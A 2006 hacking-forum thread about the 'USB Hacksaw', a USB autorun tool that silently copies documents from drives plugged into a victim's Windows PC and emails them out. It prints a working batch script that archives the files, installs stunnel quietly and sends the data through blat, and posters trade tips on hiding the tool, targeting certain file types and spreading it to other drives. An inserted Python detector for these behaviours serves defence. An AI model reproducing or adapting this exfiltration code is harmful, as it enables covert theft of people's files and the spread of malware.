Darren Kitchen Posted October 6, 2006
Released on HAK.5 Episode 2x03 -- The USB Hacksaw is an evolution of the popular USB Switchblade that uses a modified version of USBDumper, Blat, Stunnel, and Gmail to automatically infect Windows PCs with a payload that will retrieve documents from USB drives plugged into the target machine and securely transmit them to an email account. Proof of concept code shows how to deliver the payload instantly with a U3 autorun hack borrowed from the USB Switchblade on Windows 2000 or higher computers running as administrator or guest. Automatic propagation to other USB devices is possible; however, it was not shown on Episode 2x03. More in the show notes here: http://www.hak5.org/wiki/USB_Hacksaw
hauser Posted October 6, 2006
To fix all those ugly blat commands in the send.bat file, replace them with one cleaner line using the for command.

:: Configure Email Options
SET emailfrom=
SET emailto=
SET password=

:: Archive documents in 1MB chunks
rar a goodies.rar .docs -v1024k -vn

stunnel-4.11.exe -install -quiet
net start stunnel
GOTO badhack

:cleanup
:: Stop stunnel
rem taskkill /f /im stunnel-4.11.exe (??)
net stop stunnel
stunnel-4.11.exe -uninstall -quiet
:: Delete documents
rmdir /s /q docs
:: Delete archive
del /q /f goodies*.*
GOTO end

:badhack
REM Damn this is crude. Welcome to sleepless, I don't give a rats ass, just work damnit, hacking kids!
REM See show notes at http://www.hak5.org/wiki/USB_Hacksaw for a better method to do this. I'm not proud of it.
for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099
GOTO cleanup

:end
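A defender's view of the send.bat above, as an added example that is not part of the original thread: it flags hosts whose process-creation log shows at least two of the script's behaviours (quiet stunnel service install, blat pointed at a loopback relay, split RAR archive) inside a short window. The log format, host names, window length and threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviours visible in the send.bat above, expressed as command-line patterns.
RULES = {
    "tunnel_service_install": re.compile(r"\bstunnel[\w.-]*\.exe\b.*\s-install\b.*\s-quiet\b", re.I),
    "mail_via_loopback": re.compile(r"\bblat(\.exe)?\b.*-server\s+(127\.0\.0\.1|localhost)(:\d+)?", re.I),
    "split_archive": re.compile(r"\brar(\.exe)?\s+a\s.*\s-v\d+[km]?\b", re.I),
}
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed sample, "<ISO time> <host> <command line>"; not real telemetry.
SAMPLE = """\
2006-10-06T14:02:10 WS-041 rar a goodies.rar docs -v1024k -vn
2006-10-06T14:02:14 WS-041 stunnel-4.11.exe -install -quiet
2006-10-06T14:02:20 WS-041 blat.exe goodies.rar -base64 -to a@example.com -server 127.0.0.1:1099
2006-10-06T14:05:00 WS-007 rar a backup.rar C:\\projects -v700m
2006-10-06T15:30:00 WS-007 blat.exe report.txt -to ops@example.com -server mail.example.com
"""

def match_rules(cmdline):
    """Names of every rule whose pattern appears in one command line."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}

def correlate(log_text, min_rules=2):
    """Map host -> sorted rule names when >= min_rules distinct rules fire within WINDOW."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, cmd = line.split(" ", 2)
        for rule in match_rules(cmd):
            hits[host].append((datetime.fromisoformat(ts), rule))
    alerts = {}
    for host, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {r for t, r in events[i:] if t - start <= WINDOW}
            if len(seen) >= min_rules:
                alerts[host] = sorted(seen)
                break
    return alerts

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE).items():
        print(host, rules)
```

WS-007 stays quiet because a split archive on its own, or blat talking to a real mail server, is ordinary administration; the combination on one host is what stands out.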
armadaender Posted October 6, 2006
Now I haven't watched the ep yet (will do once home from work) but can the target files to be copied and sent back be changed? I.E. targeting only files in "My Documents" or specifically certain log files for programs?
therian16 Posted October 6, 2006
A couple of questions:
Is there a way to make this a timed thing? Example: insert drive on Monday and have it antidote itself Friday, or maybe just run until the computer gets restarted.
Every time the payload gets run I receive the file in Gmail but when I try to open it, I get an error the file is unknown format or corrupt. Anyone else getting this?
Is there a way to make the payload NOT run on my Hacksaw? Every time I insert my hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a usb is inserted. Any ideas?
DLSS Posted October 6, 2006
how bout the amish type version , i hoped i could change the stuff but i can't fully understand wot is doing wot how (are there files missing ?? )
Darren Kitchen Posted October 6, 2006 Author
> A couple of questions:
> Is there a way to make this a timed thing? Example: insert drive on Monday and have it antidote itself Friday, or maybe just run until the computer gets restarted.
> Every time the payload gets run I receive the file in Gmail but when I try to open it, I get an error the file is unknown format or corrupt. Anyone else getting this?
> Is there a way to make the payload NOT run on my Hacksaw? Every time I insert my hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a usb is inserted. Any ideas?

For development and testing purposes I've included an uninstaller in the antidote directory. Also hold the shift key while inserting your usb drive to have it not infect your system again. But no, the sbs.exe will rip the contents of a removable drive regardless. Obviously the code can be changed to only copy certain files, etc.
therian16 Posted October 6, 2006
The problem that I was referring to, aardwolf, is when I infect a computer for the first time it copies my wip folder and sends that to myself. Is there a setting to exclude certain folders on a usb? If so just ignore wip and my problem is solved. Also you mention there is a way to only grab certain types of documents, how is that set up?
PoyBoy Posted October 7, 2006
Oh boy oh boy. I can't wait to see the direction this takes... What's next? A USB pressure cooker?
therian16 Posted October 7, 2006
I added the Hacksaw payload to my Switchblade so here's what I did and how I protect myself:
1. copied SBS to CMD folder as required
2. created a hacksaw.bat with the go.cmd from the hacksaw payload
3. added <call hacksaw.bat> to the top of the Switchblade go.cmd
4. to protect my personal computer I created a file called test.txt at c:test.txt
5. in the hacksaw.bat I added this line to the top
if exist c:test.txt goto end
and created the :end tag at the bottom.
This not only adds Hacksaw to Switchblade but also protects your personal computer from infection while using your own . One thing I would like to add still is some kind of delay on running sbs.exe. Is there a way to get system time, then add say 5-15 minutes, then have sbs execute? That would get rid of sending your own Hacksaw program to yourself.
fuzion8 Posted October 7, 2006
I can't believe the luck, some guy came in and traded me a 2GB Scamdisk Micro for a power supply...
*edit Must RTFM before asking dumb questions...
arkon Posted October 7, 2006
This just keeps getting scarier. If you now take the code used for "podslurping" you can run a routine that searches for all Excel files, PDF documents, Word docs etc and email those off as well. To get really blackhat it would not take much to then also automatically run these security applications that run off of a USB drive: http://www.watchyourend.com/2006/03/22/por...on-a-usb-drive/ And email the results of scans outside the network.
xFilthyxJesusx Posted October 7, 2006
How can I use ahmish's version of this.... do I go to the switchblade and just replace the files with these?
DLSS Posted October 7, 2006
> How can I use ahmish's version of this.... do I go to the switchblade and just replace the files with these?

unfortunately no tht won't work correctly and even wen modding it a lil it still tends to hide ure files in the maindir of yer stick and make em systemfiles for some reason ....
xFilthyxJesusx Posted October 7, 2006
Well that would be a good thing. I'm going to try and edit it and see what I can do. In the episode they said it was possible. I'll see what I come up with.
DLSS Posted October 7, 2006
> Well that would be a good thing. I'm going to try and edit it and see what I can do. In the episode they said it was possible. I'll see what I come up with.

it is but the problem is it will only work if u autorun the go directly. if u do it thru nircmd in ure maindir it will copy ure maindir to that folder instead of the needed files .... if u do call the go.cmd directly its obviously visible ... i'm gonna try n see if i can make a silent installer which first copies the files to a windows directory and then runs the go.cmd invisible (if possible) i did something similar b4 but tht was only using cmd's and ftp's ...
ps anyone thought bout making it uber tiny by just using a cmd and ftp file + nircmd that way u can just have those placed on his hdd , connect to a ftp dload the files needed , delete itself and run . (a tactic i use @ school for a lot of stuff cos they block web access but i can still access my ftp thru commandline)
xFilthyxJesusx Posted October 7, 2006
Well I did it. So here.... http://www.fileden.com/files/2006/7/8/1164...cksaw_NonU3.rar
NonU3 working. Just obviously copy this to the root of your drive. I upped the file size of the rar's to 10m because I don't want a bunch of little 1mb files in my inbox. I also renamed goodies to BackUp. I'm wondering what the cmd option is to enter in the computer name.... like %appdata% gives the link to appdata. I know there's one for the computer name as well. I'd like this to attach it to the filename of the rar'd files. So I can determine where it came from. I'd also like the ones for date and time. Cheers kids.
DLSS Posted October 7, 2006
> Well I did it. So here.... http://www.fileden.com/files/2006/7/8/1164...cksaw_NonU3.rar
> NonU3 working. Just obviously copy this to the root of your drive. I upped the file size of the rar's to 10m because I don't want a bunch of little 1mb files in my inbox. I also renamed goodies to BackUp. I'm wondering what the cmd option is to enter in the computer name.... like %appdata% gives the link to appdata. I know there's one for the computer name as well. I'd like this to attach it to the filename of the rar'd files. So I can determine where it came from. I'd also like the ones for date and time. Cheers kids.

that would be %computername%
xFilthyxJesusx Posted October 7, 2006
I thought so. Thank you... Now to make it work while deleting and uploading. Because of the Send.bat
foikerz Posted October 7, 2006
Hi ppl. Thankz for the nonU3usb chainsaw it came really handy. Since it's my first post I'll go nice and smooth :). A minor correction at Jesu's code: you left the del goodies part instead of BackUp so that's it. The correct code would be:

WIPSBSsend.bat
:: Delete archive
del /q /f BackUp*.*
GOTO end

Furthermore, I'm having problems with it. The first time it backed up and sent me the email but the thing is that it won't do it again. I'm trying to figure it out so if you think of something feel free to inform me. Peace out. :)
xFilthyxJesusx Posted October 8, 2006
Ya I noticed that too. I fixed it for myself and forgot to reupload the rar. Sorry about that guys.
sircrumpet Posted October 8, 2006
ok - my one concern here (and I haven't tried it yet), but what would happen if someone came along with either an ipod or a portable HDD or something with say, 60Gb of data. I'm assuming it would read it in the same way it reads a flash drive and attempt to copy and email it off, but it would take more than a few seconds to copy over 60+ GB of data, even longer to email it off, and then there's the problem of the 2ish GB limit on Gmail.
PoyBoy Posted October 8, 2006
/The wrench is currently falling toward the gears. Will someone catch it?
spektormax Posted October 8, 2006
http://hak5.org/forums/viewtopic.php?t=2889 This is a combo of hacksaw, switchblade, VNC, and Nmap?? Check it out
core-dump Posted October 8, 2006
> ok - my one concern here (and I haven't tried it yet), but what would happen if someone came along with either an ipod or a portable HDD or something with say, 60Gb of data. I'm assuming it would read it in the same way it reads a flash drive and attempt to copy and email it off, but it would take more than a few seconds to copy over 60+ GB of data, even longer to email it off, and then there's the problem of the 2ish GB limit on Gmail.

Filter volume by used space, or filter the volume's directory-tree based on target file extension(s) and size.
G-Stress Posted October 8, 2006
Was wondering how this code could be modified to once a machine is infected to be copied back to any usb drive and infect it with the same payload, also if so and say that's the scenario. Who knows what usb drive will be plugged in and if it will be non-u3 or u3 and also if that's the case what about digital card readers connected via usb and other usb media?